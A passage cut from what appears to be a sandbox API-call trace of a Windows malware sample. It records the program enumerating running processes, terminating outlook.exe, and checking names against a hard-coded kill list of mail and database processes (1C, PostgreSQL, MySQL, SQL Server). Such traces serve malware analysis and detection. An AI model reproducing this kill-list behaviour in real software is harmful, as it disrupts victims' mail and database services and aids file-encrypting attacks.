th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.589] lstrlenW (lpString="svchost.exe") returned 11 [0156.589] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.590] lstrlenW (lpString="svchost.exe") returned 11 [0156.590] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.590] lstrlenW (lpString="svchost.exe") returned 11 [0156.590] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.591] lstrlenW (lpString="svchost.exe") returned 11 [0156.591] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.592] lstrlenW (lpString="svchost.exe") returned 11 [0156.592] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.592] lstrlenW (lpString="svchost.exe") returned 11 [0156.592] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.593] lstrlenW (lpString="svchost.exe") returned 11 [0156.593] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.593] lstrlenW (lpString="svchost.exe") returned 11 [0156.593] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.594] lstrlenW (lpString="svchost.exe") returned 11 [0156.594] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0156.595] lstrlenW (lpString="spoolsv.exe") returned 11 [0156.595] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.595] lstrlenW (lpString="svchost.exe") returned 11 [0156.595] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0156.596] lstrlenW (lpString="audiodg.exe") returned 11 [0156.596] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0156.597] lstrlenW (lpString="sihost.exe") returned 10 [0156.597] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.597] lstrlenW (lpString="svchost.exe") returned 11 [0156.597] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0156.598] lstrlenW (lpString="taskhostw.exe") returned 13 [0156.598] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0156.598] lstrlenW (lpString="explorer.exe") returned 12 [0156.598] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0156.624] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0156.624] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0156.625] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0156.625] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0156.626] lstrlenW (lpString="Memory Compression") returned 18 [0156.626] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0156.627] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0156.627] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0156.628] lstrlenW (lpString="SearchUI.exe") returned 12 [0156.628] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0156.629] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0156.629] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0156.630] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0156.630] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending_windsor_bouquet.exe")) returned 1 [0156.631] lstrlenW (lpString="pending_windsor_bouquet.exe") returned 27 [0156.631] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers.exe")) returned 1 [0156.632] lstrlenW (lpString="workers.exe") returned 11 [0156.632] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x520, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="succeed.exe")) returned 1 [0156.633] lstrlenW (lpString="succeed.exe") returned 11 [0156.633] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="washer jar.exe")) returned 1 [0156.634] lstrlenW (lpString="washer jar.exe") returned 14 [0156.634] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights_attending_other.exe")) returned 1 [0156.635] lstrlenW (lpString="nights_attending_other.exe") returned 26 [0156.635] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="useful_courts.exe")) returned 1 [0156.635] lstrlenW (lpString="useful_courts.exe") returned 17 [0156.636] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="compounds spanish.exe")) returned 1 [0156.636] lstrlenW (lpString="compounds spanish.exe") returned 21 [0156.636] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="look-albuquerque-left.exe")) returned 1 [0156.637] lstrlenW (lpString="look-albuquerque-left.exe") returned 25 [0156.637] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="try.exe")) returned 1 [0156.638] lstrlenW (lpString="try.exe") returned 7 [0156.638] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="statuteide.exe")) returned 1 [0156.638] lstrlenW (lpString="statuteide.exe") returned 14 [0156.638] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0156.639] lstrlenW (lpString="invite.exe") returned 10 [0156.639] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="register voluntary fluid.exe")) returned 1 [0156.640] lstrlenW (lpString="register voluntary fluid.exe") returned 28 [0156.640] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="cope finances ringtones.exe")) returned 1 [0156.641] lstrlenW (lpString="cope finances ringtones.exe") returned 27 [0156.641] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="modules_recommend.exe")) returned 1 [0156.642] lstrlenW (lpString="modules_recommend.exe") returned 21 [0156.642] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazinedeletecomparisons.exe")) returned 1 [0156.643] lstrlenW (lpString="magazinedeletecomparisons.exe") returned 29 [0156.643] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0156.644] lstrlenW (lpString="svchost.exe") returned 11 [0156.644] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0156.644] lstrlenW (lpString="3dftp.exe") returned 9 [0156.644] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0156.645] lstrlenW (lpString="absolutetelnet.exe") returned 18 [0156.645] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0156.646] lstrlenW (lpString="alftp.exe") returned 9 [0156.646] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0156.647] lstrlenW (lpString="barca.exe") returned 9 [0156.647] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0156.648] lstrlenW (lpString="bitkinex.exe") returned 12 [0156.648] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0156.649] lstrlenW (lpString="coreftp.exe") returned 11 [0156.649] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0156.650] lstrlenW (lpString="far.exe") returned 7 [0156.650] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0156.651] lstrlenW (lpString="filezilla.exe") returned 13 [0156.651] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0156.652] lstrlenW (lpString="flashfxp.exe") returned 12 [0156.652] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0156.653] lstrlenW (lpString="fling.exe") returned 9 [0156.653] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0156.654] lstrlenW (lpString="foxmailincmail.exe") returned 18 [0156.654] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0156.655] lstrlenW (lpString="gmailnotifierpro.exe") returned 20 [0156.655] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0156.656] lstrlenW (lpString="icq.exe") returned 7 [0156.656] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0156.657] lstrlenW (lpString="leechftp.exe") returned 12 [0156.657] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0156.658] lstrlenW (lpString="ncftp.exe") returned 9 [0156.658] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0156.659] lstrlenW (lpString="notepad.exe") returned 11 [0156.659] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0156.660] lstrlenW (lpString="operamail.exe") returned 13 [0156.660] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0156.661] lstrlenW (lpString="outlook.exe") returned 11 [0156.661] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0xef0) returned 0x244 [0156.661] TerminateProcess (hProcess=0x244, uExitCode=0x0) returned 1 [0156.691] CloseHandle (hObject=0x244) returned 1 [0156.691] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0156.692] lstrlenW (lpString="pidgin.exe") returned 10 [0156.692] lstrcmpiW (lpString1="1c8.exe", lpString2="pidgin.exe") returned -1 [0156.692] lstrcmpiW (lpString1="1cv77.exe", lpString2="pidgin.exe") returned -1 [0156.692] lstrcmpiW (lpString1="outlook.exe", lpString2="pidgin.exe") returned -1 [0156.692] lstrcmpiW (lpString1="postgres.exe", lpString2="pidgin.exe") returned 1 [0156.692] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="pidgin.exe") returned -1 [0156.692] lstrcmpiW (lpString1="mysqld.exe", lpString2="pidgin.exe") returned -1 [0156.692] lstrcmpiW (lpString1="sqlservr.exe", lpString2="pidgin.exe") returned 1 [0156.692] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0156.693] lstrlenW (lpString="scriptftp.exe") returned 13 [0156.693] lstrcmpiW (lpString1="1c8.exe", lpString2="scriptftp.exe") returned -1 [0156.693] lstrcmpiW (lpString1="1cv77.exe", lpString2="scriptftp.exe") returned -1 [0156.694] lstrcmpiW (lpString1="outlook.exe", lpString2="scriptftp.exe") returned -1 [0156.694] lstrcmpiW (lpString1="postgres.exe", lpString2="scriptftp.exe") returned -1 [0156.694] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="scriptftp.exe") returned -1 [0156.694] lstrcmpiW (lpString1="mysqld.exe", lpString2="scriptftp.exe") returned -1 [0156.694] lstrcmpiW (lpString1="sqlservr.exe", lpString2="scriptftp.exe") returned 1 [0156.694] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0156.695] lstrlenW (lpString="skype.exe") returned 9 [0156.695] lstrcmpiW (lpString1="1c8.exe", lpString2="skype.exe") returned -1 [0156.695] lstrcmpiW (lpString1="1cv77.exe", lpString2="skype.exe") returned -1 [0156.695] lstrcmpiW (lpString1="outlook.exe", lpString2="skype.exe") returned -1 [0156.695] lstrcmpiW (lpString1="postgres.exe", lpString2="skype.exe") returned -1 [0156.695] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="skype.exe") returned -1 [0156.695] lstrcmpiW (lpString1="mysqld.exe", lpString2="skype.exe") returned -1 [0156.695] lstrcmpiW (lpString1="sqlservr.exe", lpString2="skype.exe") returned 1 [0156.695] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0156.698] lstrlenW (lpString="smartftp.exe") returned 12 [0156.698] lstrcmpiW (lpString1="1c8.exe", lpString2="smartftp.exe") returned -1 [0156.698] lstrcmpiW (lpString1="1cv77.exe", lpString2="smartftp.exe") returned -1 [0156.698] lstrcmpiW (lpString1="outlook.exe", lpString2="smartftp.exe") returned -1 [0156.698] lstrcmpiW (lpString1="postgres.exe", lpString2="smartftp.exe") returned -1 [0156.698] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smartftp.exe") returned -1 [0156.698] lstrcmpiW (lpString1="mysqld.exe", lpString2="smartftp.exe") returned -1 [0156.698] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smartftp.exe") returned 1 [0156.698] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0156.699] lstrlenW (lpString="thunderbird.exe") returned 15 [0156.699] lstrcmpiW (lpString1="1c8.exe", lpString2="thunderbird.exe") returned -1 [0156.699] lstrcmpiW (lpString1="1cv77.exe", lpString2="thunderbird.exe") returned -1 [0156.699] lstrcmpiW (lpString1="outlook.exe", lpString2="thunderbird.exe") returned -1 [0156.699] lstrcmpiW (lpString1="postgres.exe", lpString2="thunderbird.exe") returned -1 [0156.699] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="thunderbird.exe") returned -1 [0156.699] lstrcmpiW (lpString1="mysqld.exe", lpString2="thunderbird.exe") returned -1 [0156.699] lstrcmpiW (lpString1="sqlservr.exe", lpString2="thunderbird.exe") returned -1 [0156.699] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0156.700] lstrlenW (lpString="totalcmd.exe") returned 12 [0156.700] lstrcmpiW (lpString1="1c8.exe", lpString2="totalcmd.exe") returned -1 [0156.700] lstrcmpiW (lpString1="1cv77.exe", lpString2="totalcmd.exe") returned -1 [0156.701] lstrcmpiW (lpString1="outlook.exe", lpString2="totalcmd.exe") returned -1 [0156.701] lstrcmpiW (lpString1="postgres.exe", 